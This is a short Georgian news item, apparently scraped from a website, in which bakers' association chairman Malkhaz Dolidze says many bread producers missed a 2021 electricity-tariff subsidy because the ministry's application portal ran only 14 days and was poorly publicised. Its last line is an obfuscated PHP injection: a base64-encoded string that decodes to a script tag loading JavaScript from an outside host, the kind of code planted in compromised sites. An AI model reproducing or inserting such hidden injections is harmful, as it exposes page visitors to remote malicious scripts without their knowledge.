celsiusi
ავერსი საქკაბელი
„პურის მცხობელთა ასოციაციის" თავმჯდომარის, მალხაზ დოლიძის განცხადებით, პურის მწარმოებელთა დიდ ნაწილს ელექტროენერგიის გადასახადი გაზრდილი ტარიფით მიუვიდა. 
 
მისივე თქმით, ბევრმა მსხვილმა წარმოებამ გაზრდილი ტარიფების სუბსიდია ვერ მიიღო, რადგან სათანადოდ არ იყო ინფორმირებული რეგისტრაციასთან დაკავშირებით.
 
„11 თეთრით მოიმატა ელექტროენერგიის საფასურმა და სუბსიდიით პურის მწარმოებლებს დაახლოებით 5- თეთრიანი შეღავათი უნდა მიეღოთ. ეკონომიკის სამინისტრომ გააკეთა პორტალი, მაგრამ სამწუხაროდ, სათანადო კომუნიკაცია არ შედგა, ამის შესახებ ბევრმა ვერ გაიგო, რომ განაცხადი იყო საჭირო სუბსიდიის მისაღებად. საკმაოდ ბევრი მსხვილი წარმოება ამაში ვერ მოხვდა. მივმართე სემეკს, ეკონომიკის სამინისტროს, რომ ამ საკითხში დაგვეხმარონ, რადგან პორტალმა სულ 14 დღე იმუშავა. გამოსავალი ისაა, რომ ეს პორტალი გაიხსნას, ყველას გავაგებინოთ, რომ ჩაერთოს“,- აღნიშნა მან „მედიაცენტრ მთავარში" გამართულ ბრიფინგზე.
 
სეგახსენებთ, რომ მთავრობა საკვები პროდუქტების მწარმოებელ კომპანიებს 2021 წლის განმავლობაში ელექტროენერგიის გაზრდილი ტარიფის 50%-ს უსუბსიდირებს.
1544
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");